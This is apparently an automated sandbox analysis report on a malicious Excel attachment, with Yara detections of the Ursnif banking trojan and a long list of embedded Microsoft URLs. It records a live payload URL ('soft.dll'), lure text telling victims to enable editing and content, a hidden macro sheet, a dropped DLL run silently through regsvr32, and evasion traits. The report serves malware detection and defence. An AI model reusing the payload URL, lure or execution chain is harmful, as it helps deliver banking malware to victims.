              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://lifecycle.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.local
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://management.azure.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://management.azure.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://messaging.office.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ncus.contentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officeapps.live.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: sharedStrings.binString found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://settings.outlook.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://staging.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://tasks.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://wus2.contentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://www.odwebp.svc.ms
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownHTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable Editing 10 from the yellow bar above 11 12 13 Once You have Enable Editing, please clic
              Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2
              Found abnormal large hidden Excel 4.0 Macro sheetShow sources
              Source: my_attach_82862.xlsbInitial sample: Sheet size: 290224
              Office process drops PE fileShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file
              Writes or reads registry keys via WMIShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMIShow sources
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1EC7 NtMapViewOfSection,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1B9C GetProcAddress,NtCreateSection,memset,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2485 NtQueryVirtualMemory,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2264
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D337EA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4F1F0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4DFD2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4D7C5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA1D40
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D34510
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4A216
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D47200
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D3A9D3
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D408E5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D31010
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 67D30F70 appears 31 times
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@15/67@7/2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C19FFCDB-9AC4-4A6F-922D-69857FBC944B} - OProcSessId.datJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: my_attach_82862.xlsbInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2253 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2200 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D30FB5 push ecx; ret
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CDEBB5 pushfd ; iretd
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE0B16 pushad ; iretd
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE10D4 push 04853024h; retf
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE2807 pushad ; retf
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY
              Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Potential thread-based time evasion detectedShow sources
              Source: Initial fileSignature Results: Thread-based counter
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6152Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D2DD7D _memset,IsDebuggerPresent,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D48402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,
